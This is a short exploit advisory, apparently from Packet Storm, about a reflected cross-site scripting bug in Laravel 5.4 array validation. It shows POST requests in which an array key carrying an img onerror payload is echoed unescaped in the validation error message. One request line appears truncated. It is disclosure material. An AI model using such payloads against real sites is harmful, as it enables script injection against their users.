Laravel 5.4 Cross Site Scripting

Type packetstorm
Reporter MaHDyfo
Modified 2017-03-07T00:00:00


                                            `# Exploit Title: Laravel non-presistent XSS in validation of arrays  
# Date: 06/03/2017  
# Exploit Author: MaHDyfo (mahdyfof[the at sign]  
# Vendor Homepage:  
# Version: 5.4  
In Laravel validation rules, assume that you set a rule to get an array input.  
$this->validate($request, [  
'lessons' => 'required|array',  
'lessons.*' => 'numeric'  
Here we say lessons should be array and the elements should be numeric.  
Now let's enter a character there to fail the validation.  
POST Request: lessons[]=1&lessons[]=4&lessons[]=abc  
It tells {"lessons.2":["The lessons.2 must be a number."]}  
That's OK up to here. But what if we place an index for the array.  
POST Request: lessons[]=1&lessons[]=4&lessons[example]=abc  
Response: {"lessons.example":["The lessons.example must be a number."]}  
POST Request: lessons[]=1&lessons[]=4&lessons[<img src=x  
Response: {"lessons.<img src=x onerror='alert(1)'>":["The lessons.<img  
src=x onerror='alert(1)'> must be a number."]}  
And it executes the alert with no problem...  
You can see this bug already exists in Laravel official doc:  
Maybe the solution is to validate the array values yourself by for  
example extending validation rules.